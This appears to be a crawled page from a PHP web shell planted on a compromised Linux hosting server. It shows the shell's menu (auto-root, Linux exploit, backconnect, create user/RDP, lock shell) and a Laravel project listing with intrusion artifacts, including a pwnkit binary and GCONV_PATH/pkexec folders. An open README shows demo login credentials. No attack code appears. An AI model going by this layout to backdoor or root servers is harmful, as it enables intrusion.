Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.139
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo15.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxrwxrwx
.git
[ DIR ]
drwxrwxrwx
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
cgyjzio
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
ficrhut
[ DIR ]
drwxr-xr-x
iaypfnu
[ DIR ]
drwxr-xr-x
icdmfux
[ DIR ]
drwxr-xr-x
jnvzxbp
[ DIR ]
drwxr-xr-x
nwxarzc
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-x---
qefjzpg
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxrwxrwx
rkxzupq
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.env
436
B
-rw-rw-rw-
.env.example
330
B
-rw-rw-rw-
.htaccess
199
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
222.php
15.76
KB
-rw-r--r--
Production_Manufacturing_Manag...
13.65
KB
-rw-rw-rw-
SETUP_PMMS.md
1.49
KB
-rw-rw-rw-
artisan
427
B
-rw-rw-rw-
composer.json
1.54
KB
-rw-rw-rw-
database_setup.sql
97
B
-rw-rw-rw-
def.html
263
B
-rw-r--r--
filefuns.php
5.86
KB
-r--r--r--
goat1.php
143.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
random.php
52.18
KB
-rw-r--r--
start-pmms.bat
96
B
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SETUP_PMMS.md
# PMMS Laravel Setup This project is configured for XAMPP on `D:\xampp` and the MariaDB database `pmms_testing`. ## Start XAMPP 1. Open XAMPP Control Panel. 2. Start Apache and MySQL. ## Database The database has already been created and seeded locally: ```powershell D:\xampp\mysql\bin\mysql.exe -uroot -e "CREATE DATABASE IF NOT EXISTS pmms_testing CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;" D:\xampp\php\php.exe artisan migrate:fresh --seed --force ``` You can also run `database_setup.sql` in phpMyAdmin, then run the migration command above. ## Run The App Double-click `start-pmms.bat`, or run: ```powershell D:\xampp\php\php.exe artisan serve --host=127.0.0.1 --port=8010 ``` Open: ```text http://127.0.0.1:8010 ``` Port `8000` is already being used by another local PHP app on this machine, so PMMS uses port `8010`. ## Seeded Demo Data - Admin user: `admin@pmms.test` - Password: `password` - Materials, products, BOMs, vendors, one purchase order, one work order, one customer, and one sales order are seeded for testing. - The app now requires login and includes a Users & Permissions module for adding multiple factory users. ## Main Modules - Dashboard - Raw materials and stock movements - Products, BOM, costing, and suggested pricing - MRP shortage planning - Procurement and PO receiving - Production work orders - QC checkpoints and inspection logs - Sales orders with automatic work-order trigger for shortfalls - Reports and CSV stock export - Users and module-level permissions
Close